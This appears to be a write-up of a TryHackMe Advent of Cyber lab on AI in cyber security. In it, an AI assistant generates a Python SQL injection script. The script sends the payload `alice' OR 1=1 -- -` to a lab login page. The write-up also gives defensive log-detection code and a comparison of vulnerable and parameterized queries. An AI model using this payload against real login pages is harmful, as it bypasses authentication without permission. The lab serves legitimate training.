AI in Security — old sAInt nick | Advent of Cyber 2025 Day 4 | Writeup

 Access the room: https://tryhackme.com/room/AIforcyber-aoc2025-y9wWQ1zRgB


The lights glimmer and servers hum blissfully at The Best Festival Company (TBFC), melting the snow surrounding the data centre. TBFC has continued its pursuit of AI excellence. After the past two years, they realize that Van Chatty, their in-house chatbot, wasn’t quite meeting their standards.

Unfortunately for the elves at TBFC, they are also not immune to performance metrics. The elves aim to find ways of increasing their velocity; something to manage the tedious, distracting tasks, which allows the elves to do the real magic.

TBFC, adventurous as ever, is trialling their brand new cyber security AI assistant, Van SolveIT, which is capable of helping the elves with all their defensive, offensive, and software needs. They decide to put this flashy technology to use as Christmas approaches, to identify, confirm, and resolve any potential vulnerabilities, before any nay-sayers can.

Overview

This lab explores the dual role of Artificial Intelligence (AI) and Machine Learning (ML) in cybersecurity — both as tools for attackers to automate and scale attacks and as defenders’ allies to enhance detection, investigation, and response.

The scenario is set against the backdrop of cybersecurity threats facing The Best Festival Company (TBFC), illustrating real-world use cases of AI in threat hunting, log analysis, phishing detection, and defensive automation.

Learning Objectives

  • Understand foundational AI/ML concepts and architectures (LLMs, Transformers).
  • Learn how attackers use AI to escalate threats and evade defenses.
  • Explore AI-assisted security monitoring and anomaly detection techniques.
  • Interact with an AI assistant for guided log analysis and cybersecurity investigations.
  • Become familiar with AI explainability tools like SHAP and LIME for model transparency.

AI in Cyber Security

Artificial intelligence has rapidly become a cornerstone of modern cyber security. Nearly every vendor now touts AI-powered solutions — not just to ride the buzzword wave, but because AI genuinely delivers measurable benefits in this domain.

Defensive Security

AI agents are increasingly deployed in blue-team operations to accelerate detection, investigation, and response. Acting as automated assistants, they continuously process telemetry — logs, network flows, endpoint signals — and enrich alerts with context.

We’re also seeing AI embedded directly into vendor appliances, such as AI-assisted firewalls and intrusion detection systems. Beyond detection, AI enables automated responses: isolating compromised devices, blocking suspicious emails, or flagging unusual login attempts in real time.

Offensive Security

On the red-team side, AI has transformed penetration testing by automating tedious, time-intensive tasks.

  • Reconnaissance & OSINT: AI streamlines information gathering from public sources.
  • Data Analysis: It parses noisy scanner outputs and maps attack surfaces with precision.

This frees human pentesters to focus on the nuanced, creative aspects of exploitation and strategy that machines cannot replicate.

AI in Software Development

AI-driven software development can feel unsettling — especially with the rise of “vibe coding” and the risks of insecure code generation. Yet, AI has proven to be a valuable ally in the development lifecycle:

  • Collaborative Coding: Acting as a virtual colleague, AI helps brainstorm and refine ideas.
  • Security Testing: AI powers SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing) scanners, auditing code and applications for vulnerabilities.

Ironically, while AI excels at finding flaws, it still struggles to consistently produce secure code. Its greatest strength lies in augmenting human developers, not replacing them.

Practical

This interactive lab will showcase how AI can be used across three areas of cyber security:

  • Red: Generate and use an exploit script.
  • Blue: Analyse web logs of an attack that has occurred.
  • Software: Analyse source code for vulnerabilities.

Stage 1:


Stage 2:

The Van SolveIT AI assistant helped generate Python scripts for the vulnerabilities in today’s Advent of Cyber web application.


AI Response: The vulnerability exists because the username field in the login.php script is vulnerable to SQL injection due to the OR clause with a single quote. This allows attackers to include arbitrary text, such as “admin” or “password”, in the username field. The OR clause enables the injection of malicious SQL code, making it easy for attackers to manipulate the database. This is a basic SQL injection attack and serves as an excellent example for teaching students about how such vulnerabilities can be exploited.

HOW TO SAVE THE FILE:
1) Open a terminal or text editor like Sublime Text.
2) Use the command nano script.py to create the file.
3) Paste the Python script into script.py.
4) Save the file with `Ctrl + X` to exit.
5) Run the script using python3 script.py.

The script will automatically display the exploit. Make sure to follow the guidelines and rules outlined in the instructions. If you’re ready to move on, click “Complete Stage to Continue.”

import requests

# Set up the login credentials
username = "alice' OR 1=1 -- -"
password = "test"

# URL to the vulnerable login page
url = "http://MACHINE_IP:5000/login.php"

# Set up the payload (the input)
payload = {
    "username": username,
    "password": password
}

# Send a POST request to the login page with our payload
response = requests.post(url, data=payload)

# Print the response content
print("Response Status Code:", response.status_code)
print("\nResponse Headers:")
for header, value in response.headers.items():
    print(f" {header}: {value}")
print("\nResponse Body:")
print(response.text)

On the page https://MACHINE_IP:5000 we have to enter the provided username and password:

username: alice' OR 1=1 -- -

password: test


Stage 3:

In stage 3, we'll have the Blue Team Assistant review the logs and provide insights into the attack.
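The kind of check a log review for this attack comes down to, as an added example that is not part of the lab or the assistant's output. The log format, IP addresses and field layout are constructed assumptions, since the page does not show the lab's logs.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in an assumed format: "ip method path form-body".
# The logger is assumed to record the username field only, never the password.
SAMPLE_LOG = """\
10.10.0.5 POST /login.php username=bob
10.10.0.9 POST /login.php username=alice%27+OR+1%3D1+--+-
10.10.0.9 GET /dashboard.php -
10.10.0.7 POST /login.php username=o%27brien
"""

# A quote that closes the string, then OR/AND with a self-equal comparison (1=1, a=a)
TAUTOLOGY = re.compile(r"'\s*(?:or|and)\s+(\w+)\s*=\s*\1\b", re.IGNORECASE)
# A quote followed later by a SQL comment marker that cuts off the rest of the query
COMMENT_CUT = re.compile(r"'.*?(?:--|#|/\*)")


def find_sqli_attempts(log_text):
    """Return (ip, path, field, decoded_value) for each suspicious form field."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue  # skip malformed lines instead of crashing
        ip, _method, path, body = parts
        # parse_qsl URL-decodes, so %27 and + are matched as ' and space
        for field, value in parse_qsl(body):
            if TAUTOLOGY.search(value) or COMMENT_CUT.search(value):
                hits.append((ip, path, field, value))
    return hits


if __name__ == "__main__":
    for hit in find_sqli_attempts(SAMPLE_LOG):
        print(hit)
```

The name o'brien contains a quote but no tautology or comment marker, so it is not flagged; matching on a bare quote alone would bury the real hit in false positives.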


Stage 4:

In stage 4, the Software Assistant will help us spot vulnerabilities in the source code.
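The flaw a source review looks for here, next to its fix, as an added example that is not the lab's code. The page does not show login.php, so the query shape, table and credentials below are constructed assumptions, and SQLite stands in for the lab's database.

```python
import sqlite3


def make_db():
    # Constructed in-memory user table; passwords are plaintext only to keep
    # the example short (a real application stores password hashes).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret-alice"), ("bob", "s3cret-bob")])
    return db


def login_vulnerable(db, username, password):
    # User input is pasted into the SQL text, so a quote in `username`
    # ends the string literal and the rest is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_hardened(db, username, password):
    # Placeholders pass the values separately from the SQL text, so the
    # quote and the comment marker stay ordinary characters in the value.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    injected = "alice' OR 1=1 -- -"  # the username used on this page
    print("vulnerable:", login_vulnerable(db, injected, "test"))
    print("hardened:  ", login_hardened(db, injected, "test"))
    print("real login:", login_hardened(db, "alice", "s3cret-alice"))
```

With the concatenated query, the database sees `username = 'alice' OR 1=1` and treats everything after `--` as a comment, so the password check never runs; the parameterized form compares the whole string against the username column and finds no match.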
